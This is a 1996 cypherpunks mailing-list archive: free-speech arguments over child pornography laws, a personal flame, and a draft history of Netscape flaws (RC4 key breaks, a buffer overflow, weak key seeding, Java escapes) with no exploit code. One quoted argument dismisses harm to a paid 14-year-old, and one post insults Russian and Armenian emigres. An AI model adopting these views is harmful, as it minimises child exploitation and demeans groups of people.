Actually 65.000$ is pronounced sixty five thousand dollars not sixty five dollars, at least in Eastern and Central Europe.

Jüri Kaljundi
AS Stallion
jk at stallion.ee

From andy at CCMSD.chem.uga.edu Wed Sep 11 13:46:46 1996
From: andy at CCMSD.chem.uga.edu (Andy Dustman)
Date: Thu, 12 Sep 1996 04:46:46 +0800
Subject: 'robert' and his 'hipcrime' web site
In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu>
Message-ID:

On Wed, 11 Sep 1996, John Anonymous MacDonald wrote:

> Have you considered who is funding this "hipcrime" site? Web sites aren't
>
> So we have a guy, probably with an education in mathematics, who likes
> abstract art. Not what would generally be considered a political figure.
> But there's something else there - something that doesn't want to be seen,
> something that is very strongly law&order, something that doesn't
> understand the anarchy of the net, and fears it. Something that has the
> money to fund lots of little pet projects. Is robert at precipice.v-site.net
> just a useful idiot who found someone who will fund his fractal creations?
> Or is he a willing participant? I guess it doesn't matter really.

Can you say, "COINTELPRO"? Howzabout "FBI"?

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka =====
Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net
http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++<

From tcmay at got.net Wed Sep 11 13:50:40 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 04:50:40 +0800
Subject: Digital rights organisation
Message-ID:

At 9:46 AM 9/11/96, Stephan Schmidt wrote:
>Hi,
>
>thinking about what happened in Germany,
>are there any 'digital rights' organisations
>in Germany ?
>
>If not, we would like to found one.
>Are there any international orgs (EFF?,...)
>who can help us ?

A wonderful idea, Stephan! You might try contacting EFF to see if a German branch exists (though EFF is not a strongly member-oriented organization, though people tell me this may be changing).

Germans should embrace the idea that the cure for bad speech is _more_ speech. Specifically, for the current German concerns, the "cure" for speech by semi-Nazi skinheads and Holocaust deniers is free and open speech. Hard to deny the Holocaust when web sites have thousands of pictures, when archives exist.

(And when speech saying the Holocaust "never happened" is outlawed, a certain fraction of the population thinks it's cool and chic to engage in this speech! Human psychology and all. This is probably what 90% of the skinheads are all about, plus some run of the mill hatred toward Turks and other immigrants who they think are taking away their jobs....)

I understand that Germans have free speech in a lot of areas, and have less censorship of sexual material than the U.S. has (television, especially). But the areas where they _do_ censor, such as discussion of the Second World War and related issues, are the ones the world sees.

Germany needs to embrace completely free speech. This is the best way to ensure that another dictator like Hitler does not get elected to power.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May                | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA    | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Wed Sep 11 14:13:37 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 05:13:37 +0800
Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID:

At 2:43 PM 9/11/96, Dr.Dimitri Vulis KOTM wrote:
>tcmay at got.net (Timothy C. May) writes:
>> And who might these people be? I suggest you name them, as I have not even
>> mentioned your name to anyone. You don't rate a complaint from me.
>
>E.g. Kelly Goen is one of the people who told me that Tim May's been
>complaining about my alleged "spit" posts.

I've only spoken to Kelly Goen _once_ in many months, and he was calling from his cellphone and we only talked for a few minutes. I don't recall mentioning Vulis. So, who are these "various people"?

>Note that Kelly's not on this mailing list (unlike at least two other
>people who said to me that Tim complained to them off-list) and that
>most of the posts Tim complains about are obvious forgeries.

Who are these "at least two other people"?

I _do_ think you're a loon. Not in the endearing sense of some net.loons, but in the peculiar kind of foaming-at-the-mouth lunacy that I've seen in several Russian and Armenian emigres.

--TCM

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May                | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA    | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Wed Sep 11 14:17:34 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 05:17:34 +0800
Subject: Child porn as thoughtcrime
Message-ID:

At 2:51 PM 9/11/96, Chuck Thompson wrote:

>The answer to all the questions in the first set is yes, in this country
>anyway, if they are interpreted by the legal system as intending to incite
>illicit sexual acts, fantasies or obsessions about children. The fantasies
>or obsessions are assumed to lead to the illegal acts.

You later mention that "Intent to commit an actual crime must be proven." Saying that fantasies or obsessions are assumed to lead to crimes is the same as thoughtcrime.

>>Clearly the first argument applies to many other things. Why not outlaw
>pro-drug speech?
>
>Hold on here.. you are making an invalid comparison. To my knowledge,
>there is no law against speaking in favor of child porn, any more than there
>is against speaking in favor of drug usage. It is against the law to *use*
>either of them.

Writing a pro-drug article on the joys of marijuana use, on the pleasures of opium, on the "naturalness" of various herbs, etc., would seem to me to be essentially "drug pornography" (by the standards of porn laws). To use your quote, "The fantasies or obsessions are assumed to lead to the illegal acts."

(By the way, the language of pro-censorship anti-pornography crusaders is being adopted by other special interest groups. Sarah Brady has called for restrictions on what she calls "gun pornography," and there are a lot of people trying to "clean up" television and movies by controlling "the pornography of violence." By your various arguments that "fantasies and obsessions" can lead to later crimes, are they not behaving as you would wish them to? If thoughtcrime about how cool guns are can be eliminated, we can save the children from gun violence!)

...
(my quote left in for context)

>>The second argument, that children are actually harmed, is vitiated by the
>fact that >much so-called child porn comes from countries where the actors
>are of legal age.
>>How can a 14-year-old Thai girl be "harmed" when what she is being paid to
>do is >>perfectly legal in Thailand?
>
>There you go again.. being legal does not, in any way, mitigate its
>harmfulness. There may be places on this earth where it is legal to

???

Are you saying that the legal system should punish people for perfectly legal behavior which is "harmful" (putatively, in a future or "inspiration" sense) to people?

(The civil litigation community is of course in agreement with you: Sue gun manufacturers for crimes committed using their guns. Sue the makers of rock climbing equipment for the harm done to rock climbers, even though voluntary. Sue the horseback riding farms for falls suffered by riders. Sue tobacco companies for the lung cancer of smokers. Sue McDonald's for the high cholesterol-induced heart attacks of customers. Sue the director of "Natural Born Killers" on behalf of victims murdered in "copycat" cases. Sue the author of "Lolita" for inspiring sex crimes. Sue.....)

>>And the case of morphings, drawings, stories, etc., clearly involve no
>actual children, >so the argument that children are harmed is empty.
>
>The argument is not dependent upon whether or not actual children are used,
>any more than whether or not an actual gun is used in a robbery - the net
>effect is the same. Children are harmed by the promotion of child porn
>because it leads to the abuse/exploitation of kids.

You seem to be arguing for class-based rights and wrongs. Does promotion of capitalism lead to the abuse and exploitation of workers? Perhaps we could outlaw pro-capitalist writings. Does pro-drug speech lead to drug abuse and misery? (Probably it does, of course.) As I asked earlier, should pro-drug speech be outlawed?
(You earlier implied that of course it should not, that pro-drug speech is protected. But if it probably leads to consumption of drugs, as nearly everyone on both sides of the issue will likely agree, isn't it the same as your point about child porn?) .... >First, you must separate opinions from actions. In this country, opinions >are not ever illegal. Some actions are. The illegality is probably (I'm Do you mean _unspoken opinions_? If so, I agree--after all, if never spoken, the opinions are unknown to others, not even to Big Brother. If, however, you mean that "_expressed_ opinions are not ever illegal," this is clearly false. Sedition laws are still on the books, as are laws outlawing the "advocacy" (an uttered opinion, surely) of various things. (I believe it was Eugene Debs who spent time in prison for expressing the opinion that the United States should not be in the Great War, or that the draft should be abolished, or something related to this.) >which we deem to be in our best interests. And, as long as the laws which >are passed do not violate our constitution, the underlying basis for passing ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Such as the "Congress shall make no law" language in the most important items in the Bill of Rights? Just where in the Constitution is it said that speech may be limited so as to reduce "fantasies and obsessions"? I read the Constitution as saying this may not be done, and I read most later Supreme Court interpretations as saying that limitations on speech may only be implemented if there is a compelling need to protect other basic rights (a la the infamous "falsely shouting "Fire!" in a crowded theater"). >Your case is weak, because it is based on the false premise that the >illegality of child pornography equates to illegality of thought. It is >overt action which is illegal, not thought. None of the acts I described in my piece involved _actions_ against children in the United States. 
Drawing a picture or writing a story is _speech_ (in the accepted definition of speech, thought, expression of views, literature, etc.). Morphing an image of Raquel Welch is speech. And so on. This is not sophistry, this is a statement of what is really happening. No actual child is involved. If one argues that speech which may lead to later crimes, by other people, can and should be outlawed, then Pandora's Box is truly opened for limiting vast amounts of speech. Words _do_ have impact, tremendous impact in fact. Free speech _can_ and _does_ lead to others committing crimes, killing themselves, acting stupidly, undermining society, even having "fantasies and obsessions." Get used to it. >By the way, Tim, I found your "translation" to be offensive, crude and >deliberately provocative. I do, however, support your right to publish it. What if it inspires a young girl to think more positively about having an incestuous relationship with her father? Mightn't it inspire "fantasies and obsessions"? And under the CDA, it's probably illegal, given that various 13- and 14-year-olds are reading this list. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. 
[excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From frantz at netcom.com Wed Sep 11 14:35:33 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 05:35:33 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609111822.LAA15265@netcom7.netcom.com> At 8:48 PM 9/10/96 -0700, Declan McCullagh wrote: >On Tue, 10 Sep 1996, Timothy C. May wrote: > >> Q: Is a drawing of a child engaging in a sexual act an illegal item? > >Under the original Hatch bill, yes. Certainly under the revised one. Of >course, Hatch's proposal goes even farther. There's no "sex act" requirement. >Judy Krug from the ALA testified about this, opposing Bruce Taylor. > >> Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old >> illegal? > >Even under the original Hatch bill, yes. It seems to me that the logic of these answers would make the movie, "Carried Away" illegal. According to a Boston Globe review (reprinted in the local rag), "... his character cheats on his longtime girlfriend with a new student who's only 17, ..." Depending on how this is depicted in the movie (Rated R), it seems to me that this could go over Hatch's line. (BTW, the review rates the movie 3 stars out of a possible 4.) ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From jlasser at rwd.goucher.edu Wed Sep 11 14:40:10 1996 From: jlasser at rwd.goucher.edu (Moltar Ramone) Date: Thu, 12 Sep 1996 05:40:10 +0800 Subject: 'robert' and his 'hipcrime' web site In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu> Message-ID: On Wed, 11 Sep 1996, John Anonymous MacDonald wrote: > Have you considered who is funding this "hipcrime" site? 
Web sites aren't
> terribly expensive these days, but someone paid at least a few hundred
> dollars in set-up fees for this.

A few hundred dollars? Probably not. There's the domain name registration (perhaps, depending on when the name was registered -- I don't care enough to find out), and maybe $20/month to some other guy. Perhaps more, but not necessarily.

> It's obvious that this guy's true passion is fractals and raytracing.
> He threw in some bomb-making stuff, but he scanned it out of a book and
> probably never tried it. Compared to the rest of the site, it looks like
> an afterthought. Someone who was really interested in chemistry would
> have taken the time to retype the info and add their own comments. He
> had a reason to have some "anarchist" info on there but he's not really
> interested in it. So basically this guy is a mathematician/artist trying
> to pretend he's an anarchist.

Like... oh... I dunno... una-something... :-)

To be an "anarchist" has nothing to do with violence, necessarily, though. Gandhi was an anarchist, of course, as are many other people (such as myself) who disclaim violence as a tactic.

> So we have a guy, probably with an education in mathematics, who likes
> abstract art. Not what would generally be considered a political figure.
> But there's something else there - something that doesn't want to be seen,
> something that is very strongly law&order, something that doesn't
> understand the anarchy of the net, and fears it.

Disagree strongly. Are you aware of the source of the name 'hipcrime'? It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw), and describes a cynical, hipster-societal dropout philosophy (or at least style) that is inclined to look at people as no more than sheep. Applying this to the 'net populace is perhaps (I hesitate somewhat to apply the term) misanthropic, but not necessarily law & order. Again, unabomber comparisons are obvious.
Still, like computer virii, the internet worm, all the promised intelligent agents and nano-mites we've been promised (which the hipcrime bot could certainly be seen as another precursor of, at least as far as intelligent agents go), there's a certain abstract beauty to the scheme, and a certain pathos. I'm reminded of the limits to growth studies which showed islands exceed their capacity to carry a particular species, and the stunning sudden decline soon after. (Come to think of it, that analogy might cover the remailer network) ---------- Jon Lasser (410)532-7138 - Obscenity is a crutch for jlasser at rwd.goucher.edu inarticulate motherfuckers. http://www.goucher.edu/~jlasser/ Finger for PGP key (1024/EC001E4D) - Fuck the CDA. From pgut001 at cs.auckland.ac.nz Wed Sep 11 14:40:35 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Thu, 12 Sep 1996 05:40:35 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84245818912499@cs26.cs.auckland.ac.nz> I've been putting together a writeup on problems in web browsers, mainly the history of the Netscape RC4/40 break, random number bugs, and problems with Java, as part of a longer paper I'm doing on crypto from a non-US perspective. A lot of the information in this section of the paper has come from this list, so I thought I'd post it for comment and in case anyone found it interesting (please don't post it to web sites or anything until the paper is actually published). If anyone has anything to add, corrections to make, etc, please let me know. Peter. 
The Netscape SSL Break and its Implications ------------------------------------------- The Secure Socket Layer (SSL) protocol, after a somewhat shaky start (version 1 was broken within 10 minutes of being unveiled [Hallam-Baker 1996]), and an attempt by Microsoft to promote a similar but competing protocol [Benaloh 1995], has more or less edged out any other protocols to become the standard for securing HTTP sessions (an overview of SSL and various other proposed WWW security mechanisms is given in [Reif 1995a]). SSL uses a combination of RSA and, usually, a proprietary (until it was reverse-engineered, of which more later) algorithm called RC4 to provide confidentiality, data integrity, and authentication. Since it was built into what was by far the most popular web browser, and because of Netscape's policy of giving away the software, it immediately gained widespread popularity. No details on RC4 were published, but the fact that it was designed by a very good cryptographer was enough to reassure most people. RC4 is used in dozens of commercial products including Lotus Notes, a number of Microsoft products such as Windows for Workgroups, Windows 95, Windows NT, and Access, Apple's AOCE, and Oracle Secure SQL. The main criticism of SSL (apart from a few protocol flaws which were fixed in later versions) was the fact that RC4 used a key of only 40 bits, making it susceptible to a brute-force attack. The reason for the 40-bit key and (according to RSADSI, the company that developed RC4) the reason why details on it were kept secret was that these conditions were required under an agreement between the Software Publishers Association (SPA) and the US government which gave special export status to the RC4 algorithm and a companion algorithm called RC2. Implementations of RC2 and RC4 which are restricted to a 40-bit key get automatic export approval provided the implementations work correctly with a set of test vectors supplied by the NSA. 
Provided the results are as expected, export approval is granted within a week. The weakness of the encryption in US-exportable SSL implementations even led the French government, which normally bans all non-government-approved use of encryption (the "decret du 18 avril 1939" defines 8 categories of arms and munitions from the most dangerous (1st category) to the least dangerous (8th category), the "decret 73-364 du 12 mars 1973" specifies that encryption belongs to the second category, and the "loi 90-1170 du 29 decembre 1990" states that use of encryption equipment must be approved by the French government), to approve the use of Netscape in France [Vincent-Carrefour 1996], presumably because the French government has no problems in breaking it. The first step in attacking SSL was to find out how RC4 worked. Since it was in widespread use, it was only a matter of time before someone picked the code apart and published the algorithm. RSADSI sell a cryptographic toolkit called BSAFE [BSAFE 1994] which contains RC4, and this seems a likely source for the code (the Windows password encryption code is also a good source, and the algorithm can be extracted in an hour or two). The results were posted to mailing lists and the Internet [Anon 1994a]. Someone with a copy of BSAFE tested it against the real thing and verified that the two algorithms produced identical results [Rescorla 1994], and someone else checked with people who had seen the original RC4 code to make sure that it had been (legally) reverse-engineered rather than (illegally) copied [Anon 1994b]. 
The RC2 code was disclosed in a similar manner in 1996, but after problems with legal threats during the RC4 disclosure process it was handled more formally: First an RC2 implementation was reverse-engineered [Anon 1996], then a specification for the algorithm was written based on the reverse-engineered code [Gutmann 1996], and finally a new implementation based on the specification was written by someone who had never seen the reverse-engineered RC2 code [Vogelheim 1996]. No legal threats were ever issued over RC2. The RC4 code was immediately subject to intense analysis in various cryptography-related fora. RC4 has two parts, the initialization phase, and the random number generation phase used for the encryption itself. An array is initialized to be a random permutation using the user's key. The random number generator then mixes the permutation and reports values looked up pseudorandomly in that permutation. Among various RC4 problems which were discussed are that the likelihood that during the initialization phase small values will remain in small positions in the initial permutation is too high; user keys are repeated to fill 256 bytes, so 'aaaa' and 'aaaaa' produce the same permutation; results are looked up at pseudorandom positions in the array, and if some internal state causes a certain sequence of positions to be looked up, there are 255 similar internal states that will look up values in the same sequence of positions (although the values in those positions will be different), from which it can be shown that cycles come in groups of 2^n, where all cycles in a group have the same length, and all cycles are of an odd length * 256 unless they are in a group of 256; there is a bias in the results so that, for example, the pattern "a a" is too likely and the pattern "a b a" is too unlikely, which can be detected only after examining about 8 trillion bytes; the internal state is not independent of the results, so that with a given result there are two 
patterns in the internal state that appear 1/256 times more often than they ought to; at least two separate methods exist for deducing the internal state from the results in around 2^900 steps; and under certain special circumstances the initial byte of the pseudo-random stream generated by RC4 is strongly correlated with only a few bytes of the key. All of these "weaknesses" except for the last one are purely theoretical in nature, and even the last one can only occur under special circumstances (it doesn't affect SSL implementations since they hash the key with MD5 rather than using it directly, which avoids the problem). Overall, the cryptographic community agreed that RC4, when used correctly, was a sound cipher. Unfortunately, due to the US export restrictions, RC4 couldn't be used correctly. Although Netscape negotiated a 128-bit key to protect each session, it sent 88 of those 128 bits in the clear so that only 40 bits of the key were actually kept secret. Now that RC4 was known, SSL became a prime target for attack. An initial attempt at breaking RC4 was made in July 1995 using encrypted data from a Microsoft Access database [Back 1995a]. This attempt involved 89 contributors and took about a week using idle computing time on workstations and PC's, with around 80% of the work being done by the top 19 contributors. Due to logistical problems, human error, and buggy software, the attempt ultimately failed, but the stage had been set for an attack on SSL. On 14 July 1995, an SSL challenge message containing an encrypted (fake) credit card order transmitted to one of Netscape's own computers was posted to mailing lists and the Internet by Hal Finney [Finney 1995a]. The challenge message was independently broken by two groups; the first to announce success in breaking it was a French researcher using idle time on a collection of 120 computers and workstations over 8 days [Doligez 1995a] [Doligez 1995b].
The 40-bit secret part of the key was 7E F0 96 1F A6, and was found after scanning just over half the key space. The average search speed was about 850,000 keys/s, with a peak of 1,350,000 keys/s. A second group had broken it two hours earlier, but announced their success a day later [Back 1995b]. The event immediately attracted international media attention, including newspaper, radio, and television coverage (although many reports were rather garbled) in France [Munger 1995], Germany [Reif 1995b], Japan [NewsBytes 1995], the UK [Arthur 1995], and the US [Beck 1995] [Sandberg 1995]. A second challenge was posted on 19 August 1995 [Finney 1995b] and an attack by a `Brute Squad' of 201 Internet-connected volunteers began at 1800 GMT on 24 August 1995. The attack involved greatly improved software with automatic communication between client workstations attacking the encryption and a central server which doled out sections of keyspace to search [Brooks 1995]. This setup took 31.8 hours to find the key, 96 36 34 0D 46. Congestion on the server being used to coordinate the attack meant that most of the machines involved were idle for perhaps 3/4 of their available time, so in theory the attack could have been completed in only 8 hours. Both the client and server software was continually upgraded during the duration of the attack. The attacks, which used only unused processing capacity on the machines, were essentially "free", and could easily be mounted using the spare processing capacity available in companies, businesses, universities, and foreign governments. By breaking a brute-force attack into a number of independent sections, as many machines as are needed can be applied to the problem, so that each doubling of the amount of hardware applied to the problem halves the time required to find the solution. Although the total investment will have doubled, the cost per recovered key is kept constant since twice as many keys can now be found in the same time.
Another possibility which has been suggested is the creation of an RC4-breaking screen saver for networked Windows machines which performs key searches during the (often prolonged) periods in which machines are left idle. One experiment in performing this kind of attack took 2 weeks using relatively slow 486/50's and Sparc 20's, with no one the wiser that the machines were being used overnight for this purpose [Young 1996]. Another attack involved a networked Windows screen saver where the client software was activated whenever a machine was otherwise idle and communicated its results to a central server on a network with around 100 PC's. By now, breaking the Netscape encryption had become a kind of processor benchmark, with one manufacturer rating the speed of their system based on how long it took to break RC4 - 8 hours on one computer [ICE 1996]. Further improvements to the attack were proposed. The most important one was to move from attacking one message at a time to attacking entire collections of messages. Instead of generating a key and testing it against a single message, it could be tested against 100 messages, so that on average one key could be found in 1/100th the time it took for a single message. Unfortunately in the case of SSL this wasn't possible, since although only 40 bits of key are kept secret, there are still a total of 128 unique key bits for each message, making it impossible to attack more than one message at a time. In effect the remaining 88 bits of key act as a `salt' in the same way the Unix password salt works. However a more simplistic implementation which uses only 40 bits of key could be attacked in this manner. The attacks on RC4 are a prime example of a publicity attack. They were carried out by volunteers using borrowed machine time, no one (apart from Netscape's stock prices) was harmed, and they achieved a great deal of publicity.
The intended goal - of proving that the restricted encryption allowed by the US government could be broken - was achieved. This fuelled intense debate within the US about the need to lift the export restrictions in order to facilitate electronic commerce. Virtually every article covering the encryption debate would eventually refer to the ease with which the 40-bit keys of the form used in SSL could be broken (see for example [Ante 1996]). The fact that it was completely uneconomical to mount a criminal attack on 40-bit SSL keys was mostly ignored (except in Netscape press releases). The enthusiasm for Internet commerce, especially commerce protected by SSL, was severely dented, and companies began to adopt a more cautious attitude in deploying commercial services over the net.

[Anon 1994a] `David Sterndark' (an alias), "RC4 Algorithm revealed", posting to sci.crypt newsgroup, message-ID , 14 September 1994.
[Anon 1994b] Anonymous, "`Alleged RC4' not real RSADSI code", posting to sci.crypt newsgroup, message-ID <9409250900.AA17035 at ds1.wu-wien.ac.at>, 25 September 1994.
[Anon 1996] Anonymous, "RC2 source code", posting to sci.crypt newsgroup, message-ID <4ehmfs$6nq at utopia.hacktic.nl>, 29 January 1996.
[Ante 1996] Spence Ante, "Everything You Ever Wanted To Know About Cryptography Legislation. . .(But Were Too Sensible to Ask)", PC World, May 1996.
[Arthur 1995] Charles Arthur, "Internet's 30bn Pound Secret Revealed", UK Independent, 17 August 1995.
[Back 1995a] Adam Back, "Announce: Brute force of RC4, 40 bits all swept", posting to sci.crypt newsgroup, message-ID , 20 July 1995.
[Back 1995b] Adam Back, "Another SSL breakage...", posting to cypherpunks mailing list, 17 August 1995.
[Beck 1995] Alan Beck, "Netscape's Export SSL Broken by 120 Workstations and One Student", HPCwire, 22 August 1995.
[Benaloh 1995] Josh Benaloh, Butler Lampson, Daniel Simon, Terence Spies, and Bennet Yee, "The Private Communication Technology Protocol (PCT)", Microsoft Corporation, October 1995.
[Brooks 1995] Piete Brooks, "Cypherpunks `brute' key cracking ring", http://www.brute.cl.cam.ac.uk/brute/.
[BSAFE 1994] BSAFE 2.1 software, RSA Data Security Inc, 1994.
[Doligez 1995a] Damien Doligez, "SSL challenge -- broken!", posting to sci.crypt newsgroup, message-ID <40sajr$sps at news-rocq.inria.fr>, 16 August 1995.
[Doligez 1995b] Damien Doligez, "SSL challenge virtual press conference", http://pauillac.inria.fr/~doligez/ssl/press-conf.html.
[Finney 1995a] Hal Finney, "SSL RC4 Challenge", posting to sci.crypt newsgroup, message-ID <3u6kmg$pm4 at jobe.shell.portal.com>, 14 July 1995.
[Finney 1995b] Hal Finney, "SSL Challenge #2", posting to cypherpunks mailing list, message-ID <199508191525.IAA16294 at jobe.shell.portal.com>, 19 August 1995.
[Gutmann 1996] Peter Gutmann, "Specification for Ron Rivests Cipher No.2", posting to sci.crypt newsgroup, message-ID <4fk39f$f70 at net.auckland.ac.nz>, 11 February 1996.
[Hallam-Baker 1996] Phill Hallam-Baker, "A problem with Navigator's cache -Reply", posting to www-security mailing list, 25 August 1996.
[ICE 1996] Integrated Computing Engines, "MIT Student Uses ICE Graphics Computer To Break Netscape Security in Less Than 8 Days", 10 January 1996.
[Munger 1995] Benoit Munger, "Cachez ces mots que je ne saurais lire", Le Devoir, 28 August 1995.
[NewsBytes 1995] "Netscape Encrypted Data Cracked", NewsBytes, Tokyo, Japan, 18 August 1995.
[Sandberg 1995] Jared Sandberg, "French Hacker Cracks Netscape Code, Shrugging Off U.S. Encryption Scheme", The Wall Street Journal, 17 August 1995, p.B3.
[Reif 1995a] Holger Reif, "Netz ohne Angst: Sicherheitsrisiken des Internet", c't Magazine, September 1995, p.174.
[Reif 1995b] Holger Reif, "Peinliche Panne: Netscape gibt ernsthafte Sicherheitslu"cken zu", c't Magazine, November 1995, p.26.
[Rescorla 1994] Eric Rescorla, "RC4 compatibility testing", posting to cypherpunks mailing list, message-Id <9409140137.AA17743 at eitech.eit.com>, 13 September 1994.
[Trei 1995] Peter Trei, "Netscape's SSL security has been compromised", posting to comp.security.misc newsgroup, message-ID <40t4ti$b8s at iii1.iii.net>, 16 August 1995.
[Vincent-Carrefour 1996] Jacques Vincent-Carrefour, "Autorisation de fourniture et d'utilisation generale de moyens de cryptologie No.2500", 509/DISSI dossier numero 950038, 7 November 1995.
[Vogelheim 1996] Daniel Vogelheim, "RRC.2 implementation available", posting to sci.crypt newsgroup, message-ID <4g5u20$e4k at news.rwth-aachen.de>, 19 February 1996.
[Young 1996] Eric Young, "Bank transactions on Internet", posting to cypherpunks mailing list, message-ID , 9 April 1996.

(In)Secure Internet Electronic Commerce
---------------------------------------

After the RC4 attacks, researchers looked for other weaknesses in Netscape. In September 1995 it was discovered that Netscape didn't check the amount of input it was fed, leading to internal buffers being overrun [Green 1995] [Neumann 1995]. This bug also existed in other browsers such as Mosaic and IBM's WebExplorer. By carefully adjusting the data fed to the browser, it was possible to force a victim's PC to execute arbitrary code simply by selecting a URL. This problem has occurred in the past in a number of other programs such as fingerd (where it was exploited by the Internet worm [Spafford 1988]), the CERN and NCSA httpd's (as explained below in the section [!!!!]), and recently splitvt, syslog, and mount/umount, leading one exasperated mailing-list moderator to wonder how many more times he'd see this problem [Bloodmask 1996]. The flaw in question can be exploited by ensuring that the code to be executed is located in the URL at a point where it overflows the end of the buffer.
A URL can contain almost any data value except for a few characters which have special significance and a binary zero, a restriction which can easily be bypassed by selecting alternative encodings for any instructions which cause problems. The browser stack looks as follows: [Diagram: URL buffer, other data, caller's saved program counter] It is therefore possible, by making the URL long enough to overwrite the other data and saved program counter, to force a jump to an attacker's code rather than returning to the calling routine, allowing an attacker to force the execution of arbitrary code on the victim's machine. Although this exploit is machine and browser-specific, by targeting the most common architecture (Windows on an Intel processor) and browser (Netscape), a reasonable chance of success can be obtained. At about the same time the stack overwrite problem was discovered, a basic flaw was found in Netscape's SSL implementation which reduced the time to break the encryption from hours to minutes. Despite an existing body of literature covering the need for carefully selected random-number generation routines for cryptographic applications [Eastlake 1994] [IEEE 1995] [Robertson 1995], one of which even included ready-to-use code [Plumb 1994], Netscape used fairly simple methods which resulted in easy-to-guess encryption keys [Goldberg 1995] [Goldberg 1996]. It was found that, under Unix, Netscape used a combination of the current time in seconds and microseconds and the process ID of the current and parent process to initialise the random number generator which produced master encryption keys.
The time can be determined to a reasonable degree of accuracy from the message being sent, the process ID's can be determined using standard Unix utilities (by people using the same machine that Netscape is running on), or by using other tricks such as the fact that an approximate process ID can often be obtained by observing the output of other network-related programs on the machine, and the parent process ID is often 1 (for example when Netscape is started from an X-windows menu) or close to the process ID. Under Windows the implementation was similarly flawed. The resulting number of values to search is smaller than the number of combinations in a 40-bit key, and much smaller than the number of combinations in the 128-bit key in the export-restricted version. Since Netscape never reseeds its internal random number generator, subsequent connections are relatively easy to break once the first one is broken. The researchers who discovered this problem released a program, unssl [unssl 1995] which would break Netscape's encryption (both the weak exportable version and the strong export-restricted version) in about a minute on an average workstation. Although one of the researchers classed it as "a silly bug", it received large amounts of media attention, including front-page coverage in the New York Times [Markoff 1995] and coverage in the Wall Street Journal [Sandberg 1995] and Daily Telegraph [Uhlig 1995]. Attempts to fix this problem introduced yet more problems. Under Windows the browser and server code, which appear to share the same random number code, don't close some of the file handles they use.
While this has no serious effect on the client software (which doesn't run over extended periods of time), it does affect the server, which after a period of time runs out of file handles so that a number of calls related to gathering random data (some of them not apparently file-related) quietly fail, significantly weakening the random-number generation process [RingZero 1995]. The problem of insecure random number generation was not unique to Netscape, and has in the past beset XDM (which generates weak xauth keys), Netrek (a network game which generates guessable RSA private keys), an earlier version of the SecuDE security toolkit (which again generated guessable RSA keys), and Sesame (a European Kerberos clone) which uses it to generate DES keys. Significant security holes are also opened up through the use of Java, which allows arbitrary programs downloaded from the net to run in a (supposedly) controlled environment on a host PC. By breaking out of this controlled environment, Java applets can act as trojan horse programs on the PC, bypassing normal security measures. The consequences of these security problems have been widely reported and include the destruction of data [Clark 1996], the ability to access arbitrary files on the system [Felten 1996b], the ability to forward sensitive information to arbitrary machines on the net (bypassing firewalls and similar measures, since the "attack" comes from a trusted machine inside the security perimeter) [Williams 1996] [Markoff 1996], or even run arbitrary native code on the machine [Felten 1996a] [Hopwood 1996] [Kennedy 1996]. This last class of flaws are the most serious, since they allow any code to be executed on a victim's machine. The problem was in the class loading code for the browser and affected all then available browsers rather than just Netscape, and could be carried out simply by a victim viewing a web page containing the hostile Java applet.
